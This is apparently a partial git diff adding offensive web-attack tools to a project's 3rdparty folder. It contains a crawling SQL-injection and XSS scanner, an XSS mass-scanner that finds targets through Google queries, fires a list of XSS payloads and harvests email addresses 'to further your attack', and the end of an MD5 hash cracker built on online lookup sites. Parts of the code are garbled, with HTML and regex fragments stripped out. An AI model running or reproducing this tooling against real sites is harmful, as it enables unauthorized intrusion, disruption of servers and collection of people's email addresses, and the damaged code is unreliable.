(AKA, non Silent SQL, non Silent XSS, causes tons of MySQL Errors + # on the site and could possibly flood someone's admin email) + +levels=7 # levels deep to tree the site (I recommend 6-8; 6 is shorter, and fairly thorough, while 8 is just plain crazy long and a little too thorough) +ignore_subdomain=True # ignore subdomains for HTTP Host field and other places (should leave as True) + +scanlimit=5 # times to scan the same URL with different query strings, + # "bob.php?id=1" and "bob.php?id=2" count as two scans, + # and until scanlimit is hit, it will continue to check + # vulnerabilities on that URL + +indent=" " # indent used when displaying the results +ignorefileext="swf,fla,gif,jpeg,jpg,tiff,png,mng,pdf,dat,mpeg,mpg,mp2,mp3,wav,mod,mov,avi,asf,asx,ogg,asc,tgz,rpm,deb,gz,bz2,zip,rar,c,cpp,h,o,ko,py,so,torrent,js,css,msi,exe,bin,dmg,x86,ut4mod,wmv,rmvb,txt,n64,cbs,max,xps,xpi" # list of file extensions that shouldn't be downloaded and scanned + +randidentlen=6 # this is so internal, you shouldn't touch it whatsoever +decapitation=True # this is so internal, you shouldn't touch it whatsoever + +## end advanced config ## + + +######################################## +### DO NOT TOUCH THE REST!!! 
### +######################################## + +## setup ## + +# import modules +import socket,sre,time,random + +# debugging +from sys import exit # exit() for debug +# debug mode +from sys import argv +debug=False +if len(argv)>=2: debug=(argv[1]=="1") + +# declare output variables +urlfields={} +postfields={} +treedurls={} +reportvar={} + +# get comment type to use +if pagetype=="asp": comnt="%2d%2d" +elif pagetype=="php": comnt="/*" +else: + print "Unknown Page Type: "+pagetype.upper() + print "Using Default Database Comment: --" + comnt="%2d%2d" + +# get session stuff to use +sessstr="(?i)" +if pagetype=="asp": sessstr+="aspsessionid([a-z]{8})=([a-z]{8})" +elif pagetype=="php": sessstr+="phpsessid=([a-z0-9]{32})" +else: + print "Unknown Page Type: "+pagetype.upper() + sessstr+=pagetype+"sessid=([a-z0-9]{32})" + print "Using Default Session Syntax: --" + +# set up the ignore file extension variable to be useable +ignorefileext=","+ignorefileext+"," + +## end setup ## + + +## function declaration ## + +# function to determine if a list object is empty in any way +def listempty(listarg): return (listarg==None or listarg==[] or type(listarg)!=type([]) or len(listarg)==0) + +# function to edit files easily +def filestuff(fname,body="",fptype=False): + + if not fptype: + if body=="": fptype="r" + else: fptype="a" + + fp=open(fname,fptype) + fp.write(str(body)) + fp.close() + +# function to remove non unique items +def uniqlist(listarg): + if type(listarg)!=type([]): return + newlist=[] + for i in range(len(listarg)): + if newlist.count(listarg[i])==0: newlist[len(newlist):len(newlist)]=[listarg[i]] + return newlist + +# function to get the page name of a url +def pagename(url): + if url[:7]=="http://": url=url[7:] + slash=url.find("/") + if slash!=-1: url=url[slash:] + else: url="/" + return url + +# function to fix urls like "http://www.google.com" or "www.google.com" into "http://www.google.com/" +def urlfix(url): + if url[:7]!="http://": url="http://"+url + 
slash=url[7:].find("/") + if slash==-1: url+="/" + return url + +# function to get the server name of a url +def servername(url,ig_subd=ignore_subdomain): + url=urlfix(url)[7:] + url=url[:url.find("/")] +# if ig_subd: url=sre.sub("^.*?([^\.]*\.[^\.]*)$","\\1",url) + return url + +def checkserver(server): + global domains + for domain in domains: + if domain[:1]==".": + if server[-len(domain)+1:]==domain[1:]: return True + else: + if server==domain: return True + return False + +# function to fix the headers so they don't contain %25's (%'s) or the xxploit code +def headerfupr(hdr,explt): + hdr=hdr.replace("%25","%") + hdr=hdr.replace(explt,"") + return hdr + +# function to remove urls from the body of a page +def removeurls(body): return sre.sub("http://([^ \"\']+)","",body) + +# function to retreive the full path of a url based on the current page url +def fullpath(url,pageurl): + + if url.lower()[:7]=="http://": return url + + if pageurl.count("?")!=0: pageurl=pageurl[:pageurl.find("?")] + + if url.count("?")>0: + if url[:1]=="?": return pageurl+url + pageurl=pageurl[:pageurl.find("?")] + + #pageurl=pageurl[:pageurl.find("?")] + + pagedomain=pageurl[:pageurl[7:].find("/")+7] + if url[:1]=="/": return pagedomain+url + + pagepath=pageurl[pageurl[7:].find("/")+7:] + pagepath=pagepath[:pagepath.rfind("/")+1] + path=pagepath+url + path=sre.sub("\.\/","\/",path) + path=sre.sub("\/([^\/]+)\/..\/","\/",path) + + return pagedomain+path + +# function to get the value of HTML attribute before a ">" +def getattrval(body,attr): + body=sre.sub("([^\>]*)\>([^\000]*)","\\1",body) + if sre.search(attr+"=(\"|'|)([^\\1\ \>]*)\\1",body)!=None: + delim=sre.sub("[^\>]* "+attr+"=(\"|'|)([^\\1\ \>]*)\\1([^\>]*)","\\1",body) + exp="[^\>]* "+attr+"=(\\"+delim+")([^" + if delim=="": exp+="\ " + else: exp+=delim + exp+="\>]*)\\"+delim+"([^\>]*)" + return sre.sub(exp,"\\2",body) + else: return "" + +# function to retreive a page based on input +def 
getpage(url,dheaders=1,redir=0,realpage=0,poststring="",exceptions=0): + + # function to recurse and try getpage() again with new values + def recurse(exceptions): + + sock.close() + exceptions+=1 + + if exceptions<=6: return getpage(url,dheaders,redir,realpage,poststring,exceptions) + else: + print "Too many recursions, skipping..." + return + + + global usecookies,urllogfile,debug,ignorefileext + if not checkserver(servername(url)): return + + if url.find("#")!=-1: url=url[:url.find("#")] + + # file extensions that need to be ignored code + fileext=sre.sub(".*(http\://[^/]*/).*","\\1",url) + if url==fileext: fileext="None" + else: fileext=sre.sub("^.*\/[^/]*\.([^\&\#\?\/]*)[^/]*$","\\1",url) + if ignorefileext.count(","+fileext+",")!=0: return + + try: + + sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((servername(url,False),80)) + + workurl=pagename(url) + theurl=url + if redir!=1: theurl=workurl + + qrytype="GET" + if poststring!="": qrytype="POST" + out=(qrytype+" "+theurl+" HTTP/1.1\n" + "Host: "+servername(url,False)+"\n" + "Connection: close\n") + if usecookies: + global cookies + out+="Cookie: "+cookies+"\n" + if poststring!="": + out+="Content-Type: application/x-www-form-urlencoded\n" + out+="Content-Length: "+str(len(poststring)) + out+="\n\n"+poststring+"\n" + out+="\r\n\r\n" + sock.send(out) + + # get response type and log the page + response=sock.recv(12)[-3:] + fp=open("logs/"+urllogfile,"a") + fp.write(url+": "+response+" "+str(realpage)+"\n") + if poststring!="": fp.write(indent+"POST: "+poststring+"\n") + fp.close() + + + # at 404 response, close connection and fail + if response=="404" or response=="500": + sock.close() + return + + # at 30[1237] response types, recurse new page + if sre.search("30[1237]",response): + while 1: + chunk="" + byte=sock.recv(1) + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + if chunk.lower()[:9]=="location:": + location=chunk.lower()[9:].strip() + if 
location=="http://"+servername(url,False)+url: location="/"
+ locpage=fullpath(location,url)
+ sock.close()
+# if url[len(url)-2:]=="" and locpage[len(locpage)-4:]=="": break
+ redir=1
+ if locpage!=url:
+ redir=0
+ if pagename(sre.sub("\\\\(\"|\')","\\1",locpage))==pagename(url):
+ print "QUOTE REDIR"
+ return
+ print "OLD:",url
+ print "NEW:",chunk.lower()
+ print "REDIR:",locpage
+ return getpage(locpage,redir=redir,realpage=realpage)
+ if realpage==1:
+ sock.close()
+ return
+
+ elif realpage==1:
+ sock.close()
+ return url
+
+ # get headers, ignoring certain HTTP headers
+ headers=""
+ type=0
+ while 1:
+ chunk=""
+ byte=sock.recv(1)
+ if byte=="\r":
+ sock.recv(1)
+ break
+ while byte!="\r":
+ chunk+=byte
+ byte=sock.recv(1)
+ sock.recv(1)
+
+ if chunk.lower()[:11]!="set-cookie:" and chunk.lower()[:5]!="date:" and chunk.lower()[:15]!="content-length:" and chunk.lower()[:11]!="keep-alive:" and chunk.lower()[:18]!="transfer-encoding:" and chunk.lower()[:11]!="connection:":
+ headers+=chunk
+
+# if chunk.lower()[:15]=="content-length:":
+# type=1
+# conlen=int(chunk[16:])
+
+ if chunk.lower()[:26]=="transfer-encoding: chunked": type=2
+
+ # no special type specified, just get the page
+ if type==0:
+ body=""
+ while 1:
+ chunk=sock.recv(200)
+ body+=chunk
+ if chunk=="": break
+
+
+ # set it up if it does have a type
+# else:
+# byte=sock.recv(1)
+# if byte=="\r": sock.recv(1)
+# else:
+# while 1:
+# i=-1
+# while byte!="\r":
+# i+=1
+# byte=sock.recv(1)
+# nbytes=sock.recv(3)
+# if nbytes=="\n\r\n": break
+
+# # content-length
+# if type==1:
+# body=""
+# for i in range(conlen):
+# chunk=sock.recv(1)
+# body+=chunk
+
+ # transfer-encoding: chunked
+ if type==2:
+ body=""
+ chunksize=""
+ while chunksize!=0:
+ byte=""
+ chunk=""
+ while byte!="\r":
+ chunk+=byte
+ byte=sock.recv(1)
+ sock.recv(1)
+ chunksize=int(chunk,16)
+ wchunksz=chunksize
+ while wchunksz>=1:
+ subchunk=sock.recv(wchunksz)
+ body+=subchunk
+ wchunksz-=len(subchunk)
+ sock.recv(2)
+
+ # clean 
up and return
+ sock.close()
+ if dheaders!=1: headers=""
+
+ return [headers,body,urlfix(url)]
+
+ # catch socket errors, such as "connection reset by peer" - trys again until it gives up and goes on to the next page
+ except socket.error:
+ print "Socket Error, Recursing..."
+ return recurse(exceptions)
+
+# function to remove everything in the "" tag from a server response
+def decapitate(body):
+
+ if body==None: return
+
+ global decapitation
+ if decapitation==True: body=sre.sub("(.+?)","",body)
+
+ return body
+
+
+# function to generate a random identification string
+def randident(thelen=randidentlen,randchars="Bghi3rj9uwEFabTGH1ImnL4xpCstUOvoPYk25qVJK8Z0Q67lWXefMRSDcdyzAN"):
+# global randidentlen
+ rndidnt=""
+ while len(rndidnt)=4:
+ body=removeexplt(body,explt)
+ body=parsebody(body)
+ body=removeexplt(body,explt)
+ else: body=parsebody(body)
+ if randstr!="": body=removeexplt(body,randstr)
+
+ return body
+
+# function to parse the body for checking agsinst others
+def parsebody(body):
+
+ global sessstr,pagetype
+
+ body=body.replace("%2d","-")
+ body=body.replace("%2D","-")
+ body=body.replace("%25","%")
+ body=body.replace("%20"," ")
+ body=body.replace("+"," ")
+ body=body.replace("%2b","+")
+ body=body.replace("%2B","+")
+ body=body.replace("%22","\"")
+ body=body.replace("\\\"","\"")
+ body=body.replace("\\'","'")
+ body=body.replace("\n","")
+ body=body.replace("\r","")
+ body=sre.sub(sessstr,"",body)
+
+ # These might cause problems
+ body=sre.sub("\]*)\>(.*?)\","",body)
+ body=sre.sub("\ "+url
+
+ pageinfo=getpage(url)
+ if listempty(pageinfo): return
+
+ body=pageinfo[1].lower()
+
+ print "AA"
+
+ # select/option, textarea
+ # check for forms
+ bodyarr=sre.split("")]
+ frmbody=bodyarr[i][bodyarr[i].find(">"):][:bodyarr[i].find("")]
+
+ actionurl=getattrval(frmsect,"action")
+ if actionurl=="" or actionurl==frmsect or actionurl=="\"\"": actionurl=pageinfo[2]
+ if actionurl.count(";")>0: actionurl=actionurl[actionurl.find(";")+1:]
+ if 
actionurl[:11].lower()=="javascript:": continue
+ actionurl=fullpath(actionurl,pageinfo[2])
+
+ print "ACTION:",actionurl
+
+ # get the input variables
+ poststring=""
+ inputarr=sre.sub("(.*?)\]*)\>(.*?)","\\2|ZZaaXXaaZZ|",frmbody).split("|ZZaaXXaaZZ|")
+ for j in range(len(inputarr)):
+
+ name=getattrval(inputarr[j],"name")
+ if name==inputarr[j] or name=="" or name=="\"\"": continue
+
+ value=getattrval(inputarr[j],"value")
+ if value==inputarr[j] or value=="" or value=="\"\"": value=""
+
+ if poststring!="": poststring+="&"
+ poststring+=name+"="+value
+
+ # get select/option tags
+ selectarr=sre.sub("(.*?)\]*)\>(.*?)","\\2|ZZaaXXaaZZ|",frmbody).split("|ZZaaXXaaZZ|")
+ for j in range(len(selectarr)):
+
+ name=getattrval(selectarr[j],"name")
+ if name==selectarr[j] or name=="" or name=="\"\"": continue
+
+ value=sre.sub("(.*?)\]*)value=(\"|'|)([^\\3\ ]*)\\3([^\>]*)\>(.*?)","\\2",selectarr[j])
+ if value==selectarr[j] or value=="" or value=="\"\"": value=""
+
+ if poststring!="": poststring+="&"
+ poststring+=name+"="+value
+ print "sel/opt: "+name+"="+value
+
+ if poststring=="": continue
+
+ if sre.search("method=([\'\"]|)post([\'\"]|)",frmsect[:frmsect.find(">")].lower())==None:
+ if actionurl.find("?")!=-1: actionurl+="&"
+ else: actionurl+="?"
+ actionurl+=poststring
+ body+=''
+ print 'GETT '
+ continue
+
+ # determine if it needs to be scanned, and if so, scan it
+ postscan=0
+ postvars=poststring.split("&")
+ if postfields.has_key(actionurl):
+ for j in range(len(postvars)):
+ postvars[j]=postvars[j][:postvars[j].find("=")]
+ if postfields[actionurl].count(postvars[j])==0:
+ postfields[actionurl].append(postvars[j])
+ postscan=1
+ else:
+ for j in range(len(postvars)): postvars[j]=postvars[j][:postvars[j].find("=")]
+ postfields[actionurl]=postvars
+ postscan=1
+
+ if postscan==1:
+ vulns=checkvars(actionurl,poststring)
+ if not listempty(vulns): dispvulns(vulns,actionurl)
+
+ print "BB"
+
+ # check for urls in "href" tags
+ # ? # part of 3? 
(src|href|location|window.open)= and http://
+ urlreg="(\'|\")(?!javascript:)(([^\>]+?)(?!\.("+ignorefileext.replace(",","|")+"))(.{3,8}?)(|\?([^\>]+?)))"
+ urlarr=sre.sub("(?s)(?i)(.+?)((src|href)=|location([\ ]*)=([\ ]*)|window\.open\()"+urlreg+"\\6","\\7|ZZaaXXaaZZ|",body).split("|ZZaaXXaaZZ|")
+ del urlarr[len(urlarr)-1]
+ urlarr.append(sre.sub("(?s)(?i)(.+?)(src|href)="+urlreg+"\\3","\\4|ZZaaXXaaZZ|",body).split("|ZZaaXXaaZZ|"))
+ del urlarr[len(urlarr)-1]
+ for i in range(len(urlarr)):
+
+ theurl=fullpath(urlarr[i],pageinfo[2])
+ if not checkserver(servername(theurl)): continue
+
+ # determine if it needs scanned and/or treed, and if so, scan and/or tree it
+ getscan=0
+ if theurl.count("?")!=0:
+ nqurl=theurl[:theurl.find("?")]
+ query=theurl[theurl.find("?")+1:]
+ query=sre.sub("\&\;","\&",query)
+ qryvars=query.split("&")
+ if urlfields.has_key(nqurl):
+ for j in range(len(qryvars)):
+ qryvars[j]=qryvars[j][:qryvars[j].find("=")]
+ if urlfields[nqurl].count(qryvars[j])==0:
+ urlfields[nqurl].append(qryvars[j])
+ getscan=1
+ else:
+ for j in range(len(qryvars)): qryvars[j]=qryvars[j][:qryvars[j].find("=")]
+ urlfields[nqurl]=qryvars
+ getscan=1
+ else:
+ if urlfields.has_key(theurl)==False: urlfields[theurl]=[]
+ nqurl=theurl
+
+ if getscan==1:
+ vulns=checkvars(theurl)
+ if not listempty(vulns): dispvulns(vulns,theurl)
+ tree=treeglob
+ if treedurls.has_key(nqurl):
+ if treedurls[nqurl].count(theurl)==0 and len(treedurls[nqurl])<=scanlimit:
+ treedurls[nqurl].append(theurl)
+ else: tree=0
+
+ else: treedurls[nqurl]=[theurl]
+ if tree==1 and level\n"
+ print "\n Example: python XSSscan.py -g inurl:'.gov' 200 -a 'XSS h4ck3d' -write xxs_found.txt -v\n"
+ print "\t[options]"
+ print "\t -g/-google : Searches google for hosts"
+ print "\t -s/-site : Searches just that site, (default port 80)"
+ print "\t -a/-alert : Change the alert pop-up message"
+ print "\t -w/-write : Writes potential XSS found to file"
+ print "\t -v/-verbose : Verbose Mode\n"
+
+def 
StripTags(text):
+ finished = 0
+ while not finished:
+ finished = 1
+ start = text.find("<")
+ if start >= 0:
+ stop = text[start:].find(">")
+ if stop >= 0:
+ text = text[:start] + text[start+stop+1:]
+ finished = 0
+ return text
+
+def timer():
+ now = time.localtime(time.time())
+ return time.asctime(now)
+
+def geturls(query):
+
+ counter = 10
+ urls = []
+
+ while counter < int(sys.argv[3]):
+ url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
+ opener = urllib2.build_opener(url)
+ opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
+ data = opener.open(url).read()
+ hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
+ #Lets add sites found to a list if not already or a google site.
+ #We don't want to upset the people that got our list for us.
+ for x in hosts:
+ if x.find('www') != -1:
+ x = x[x.find('www'):]
+ if x not in urls and re.search("google", x) == None:
+ urls.append(x)
+ counter += 10
+ return urls
+
+def getemails(site):
+
+ try:
+ if site.split("/",1)[0] not in done:
+ print "\t[+] Collecting Emails:",site.split("/",1)[0]
+ webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read()
+ emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
+ done.append(site.split("/",1)[0])
+ if emails:
+ return emails
+ except(KeyboardInterrupt):
+ print "\n[-] Cancelled -",timer(),"\n"
+ sys.exit(1)
+ except(IndexError):
+ pass
+
+def getvar(site):
+
+ names = []
+ actions = []
+ print "\n","-"*45
+ print "[+] Searching:",site
+ try:
+ webpage = urllib2.urlopen(proto+"://"+site, port).read()
+ emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
+ var = re.findall("\?[\w\.\-/]*\=",webpage)
+ if len(var) >=1:
+ var = list(sets.Set(var))
+ found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower())
+ found_action = list(sets.Set(found_action))
+ if len(found_action) >= 1:
+ for a in found_action:
+ a = a.split('"',2)[1]
+ try:
+ if a[0] != 
"/":
+ a = "/"+a
+ except(IndexError):
+ pass
+ actions.append(a)
+ found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower())
+ found_names = list(sets.Set(found_names))
+ for n in found_names:
+ names.append(n.split('"',2)[1])
+ print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)
+ print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads)
+ if len(var) >= 1:
+ for v in var:
+ if site.count("/") >= 2:
+ for x in xrange(site.count("/")):
+ for xss in xss_payloads:
+ tester(site.rsplit('/',x+1)[0]+"/"+v+xss)
+ for xss in xss_payloads:
+ tester(site+"/"+v+xss)
+
+ if len(names) >= 1:
+ for n in names:
+ if site.count("/") >= 2:
+ for x in xrange(site.count("/")):
+ for xss in xss_payloads:
+ tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss)
+ for xss in xss_payloads:
+ tester(site+"/"+"?"+n+"="+xss)
+
+ if len(actions) != 0 and len(names) >= 1:
+ for a in actions:
+ for n in names:
+ if site.count("/") >= 2:
+ for x in xrange(site.count("/")):
+ for xss in xss_payloads:
+ tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss)
+ #tester(site.split("/")[0]+a+"?"+n+"="+xss)
+
+ if len(actions) != 0 and len(var) >= 1:
+ for a in actions:
+ for v in var:
+ if site.count("/") >= 2:
+ for x in xrange(site.count("/")):
+ for xss in xss_payloads:
+ tester(site.rsplit('/',x+1)[0]+a+v+xss)
+ else:
+ for xss in xss_payloads:
+ tester(site.split("/")[0]+a+v+xss)
+ if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
+ urls.remove(site)
+
+ except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror):
+ if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
+ urls.remove(site)
+ pass
+ except(KeyboardInterrupt):
+ print "\n[-] Cancelled -",timer(),"\n"
+ sys.exit(1)
+
+def tester(target):
+
+ if verbose ==1:
+ if message != "":
+ print "Target:",target.replace(alert ,message)
+ else:
+ print "Target:",target
+
+ try:
+ source = 
urllib2.urlopen(proto+"://"+target, port).read()
+ h = httplib.HTTPConnection(target.split('/')[0], int(port))
+ try:
+ h.request("GET", "/"+target.split('/',1)[1])
+ except(IndexError):
+ h.request("GET", "/")
+ r1 = h.getresponse()
+ if verbose ==1:
+ print "\t[+] Response:",r1.status, r1.reason
+ if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418):
+ if target not in found_xss:
+ if message != "":
+ print "\n[!] XSS:", target.replace(alert ,message)
+ else:
+ print "\n[!] XSS:", target
+ print "\t[+] Response:",r1.status, r1.reason
+ emails = getemails(target)
+ if emails:
+ print "\t[+] Email:",len(emails),"addresses\n"
+ found_xss.setdefault(target, list(sets.Set(emails)))
+ else:
+ found_xss[target] = "None"
+ except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):
+ pass
+ except(KeyboardInterrupt):
+ print "\n[-] Cancelled -",timer(),"\n"
+ sys.exit(1)
+ except():
+ pass
+
+if len(sys.argv) <= 2:
+ usage()
+ sys.exit(1)
+
+for arg in sys.argv[1:]:
+ if arg.lower() == "-v" or arg.lower() == "-verbose":
+ verbose = 1
+ if arg.lower() == "-w" or arg.lower() == "-write":
+ txt = sys.argv[int(sys.argv[1:].index(arg))+2]
+ if arg.lower() == "-a" or arg.lower() == "-alert":
+ message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2])
+
+title()
+socket.setdefaulttimeout(10)
+found_xss = {}
+done = []
+count = 0
+proto = "http"
+alert = "D3HYDR8%2D0wNz%2DY0U"
+print "\n[+] XSS_scan Loaded"
+try:
+ if verbose ==1:
+ print "[+] Verbose Mode On"
+except(NameError):
+ verbose = 0
+ print "[-] Verbose Mode Off"
+try:
+ if message:
+ print "[+] Alert:",message
+except(NameError):
+ print "[+] Alert:",alert
+ message = ""
+ pass
+
+xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E",
+ "%22%3E",
+ "%22%3E",
+ "'';!--\"<%27"+alert+"%27>=&{()}",
+ 
"';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function",
+ ""]
+try:
+ if txt:
+ print "[+] File:",txt
+except(NameError):
+ txt = None
+ pass
+print "[+] XSS Payloads:",len(xss_payloads)
+if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
+ try:
+ if sys.argv[3].isdigit() == False:
+ print "\n[-] Argument [",sys.argv[3],"] must be a number.\n"
+ sys.exit(1)
+ else:
+ if int(sys.argv[3]) <= 10:
+ print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n"
+ sys.exit(1)
+ except(IndexError):
+ print "\n[-] Need number of hosts to collect.\n"
+ sys.exit(1)
+ query = re.sub("\s","+",sys.argv[2])
+ port = "80"
+ print "[+] Query:",query
+ print "[+] Querying Google..."
+ urls = geturls(query)
+ print "[+] Collected:",len(urls),"hosts"
+ print "[+] Started:",timer()
+ print "\n[-] Cancel: Press Ctrl-C"
+ time.sleep(3)
+ while len(urls) > 0:
+ print "-"*45
+ print "\n[-] Length:",len(urls),"remain"
+ getvar(random.choice(urls))
+if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site":
+ site = sys.argv[2]
+ try:
+ if sys.argv[3].isdigit() == False:
+ port = "80"
+ else:
+ port = sys.argv[3]
+ except(IndexError):
+ port = "80"
+ print "[+] Site:",site
+ print "[+] Port:",port
+ if site[:7] == "http://":
+ site = site.replace("http://","")
+ if site[:8] == "https://":
+ proto = "https"
+ if port == "80":
+ print "[!] Using port 80 with https? 
(443)"
+ site = site.replace("https://","")
+ print "[+] Started:",timer()
+ print "\n[-] Cancel: Press Ctrl-C"
+ time.sleep(4)
+ getvar(site)
+
+print "-"*65
+print "\n\n[+] Potential XSS found:",len(found_xss),"\n"
+time.sleep(3)
+if txt != None and len(found_xss) >=1:
+ xss_file = open(txt, "a")
+ xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n")
+ xss_file.writelines("\t------------------------------------------\n\n")
+ print "[+] Writing Data:",txt
+else:
+ print "[-] No data written to disk"
+for k in found_xss.keys():
+ count+=1
+ if txt != None:
+ if message != "":
+ xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n")
+ else:
+ xss_file.writelines("["+str(count)+"] "+k+"\n")
+ if message != "":
+ print "\n["+str(count)+"]",k.replace(alert ,message)
+ else:
+ print "\n["+str(count)+"]",k
+ addrs = found_xss[k]
+ if addrs != "None":
+ print "\t[+] Email addresses:"
+ for addr in addrs:
+ if txt != None:
+ xss_file.writelines("\tEmail: "+addr+"\n")
+ print "\t -",addr
+print "\n[-] Done -",timer(),"\n"
+
diff --git a/3rdparty/XSSscan_v1.1.py b/3rdparty/XSSscan_v1.1.py
new file mode 100644
index 0000000..9028e9f
--- /dev/null
+++ b/3rdparty/XSSscan_v1.1.py
@@ -0,0 +1,258 @@
+#!/usr/bin/python
+#XSS Scanner that can find hosts using a google query or search one site.
+#If XSS is found it attempts to collect email addresses to further your attack
+#or warn the target of the flaw. When the scan is complete
+#it will print out the XSS's found and or write to file, it will find false positives
+#so manually check before getting to excited. It also has verbose mode and
+#you can change the alert pop-up message, check options!!
+#Warning: Don't change the alert pop-up to something that will be different in the source. (symbol encoding)
+#d3hydr8[at]gmail[dot]com
+
+import sys, urllib2, re, sets, random, httplib, time, socket
+
+def title():
+ print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.1"
+ print "\t-----------------------------------------------"
+
+def usage():
+ title()
+ print "\n Usage: python XSSscan.py
', html)
+
+ if match:
+ return match.group().split('b>')[1][:-2]
+
+ return None
+
+
+class THEKAINE:
+
+ name = "thekaine"
+ url = "http://md5.thekaine.de"
+ supported_algorithm = [MD5]
+
+ def isSupported (self, alg):
+ """Return True if HASHCRACK can crack this type of algorithm and
+ False if it cannot."""
+
+ if alg in self.supported_algorithm:
+ return True
+ else:
+ return False
+
+
+ def crack (self, hashvalue, alg):
+ """Try to crack the hash.
+ @param hashvalue Hash to crack.
+ @param alg Algorithm to crack."""
+
+ # Check if the cracker can crack this kind of algorithm
+ if not self.isSupported (alg):
+ return None
+
+ # Build the URL
+ url = "http://md5.thekaine.de/?hash=%s" % (hashvalue)
+
+ # Make the request
+ response = do_HTTP_request ( url )
+
+ # Analyze the response
+ html = None
+ if response:
+ html = response.read()
+ else:
+ return None
+
+ match = search (r'

[^<]*', html)
+
+ if match:
+
+ match2 = search (r'not found', match.group() )
+
+ if match2:
+ return None
+ else:
+ return match.group().split('b>')[1][:-2]
+
+
+
+class TMTO:
+
+ name = "tmto"
+ url = "http://www.tmto.org"
+ supported_algorithm = [MD5]
+
+ def isSupported (self, alg):
+ """Return True if HASHCRACK can crack this type of algorithm and
+ False if it cannot."""
+
+ if alg in self.supported_algorithm:
+ return True
+ else:
+ return False
+
+
+ def crack (self, hashvalue, alg):
+ """Try to crack the hash.
+ @param hashvalue Hash to crack.
+ @param alg Algorithm to crack."""
+
+ # Check if the cracker can crack this kind of algorithm
+ if not self.isSupported (alg):
+ return None
+
+ # Build the URL
+ url = "http://www.tmto.org/api/latest/?hash=%s&auth=true" % (hashvalue)
+
+ # Make the request
+ response = do_HTTP_request ( url )
+
+ # Analyze the response
+ html = None
+ if response:
+ html = response.read()
+ else:
+ return None
+
+ match = search (r'text="[^"]+"', html)
+
+ if match:
+ return decodestring(match.group().split('"')[1])
+ else:
+ return None
+
+
+class MD5_DB:
+
+ name = "md5-db"
+ url = "http://md5-db.de"
+ supported_algorithm = [MD5]
+
+ def isSupported (self, alg):
+ """Return True if HASHCRACK can crack this type of algorithm and
+ False if it cannot."""
+
+ if alg in self.supported_algorithm:
+ return True
+ else:
+ return False
+
+
+ def crack (self, hashvalue, alg):
+ """Try to crack the hash.
+ @param hashvalue Hash to crack.
+ @param alg Algorithm to crack."""
+
+ # Check if the cracker can crack this kind of algorithm
+ if not self.isSupported (alg):
+ return None
+
+ # Build the URL
+ url = "http://md5-db.de/%s.html" % (hashvalue)
+
+ # Make the request
+ response = do_HTTP_request ( url )
+
+ # Analyze the response
+ if not response:
+ return None
+
+ html = None
+ if response:
+ html = response.read()
+ else:
+ return None
+
+ match = search (r'Es wurden 1 m.gliche Begriffe gefunden, die den Hash \w* verwenden: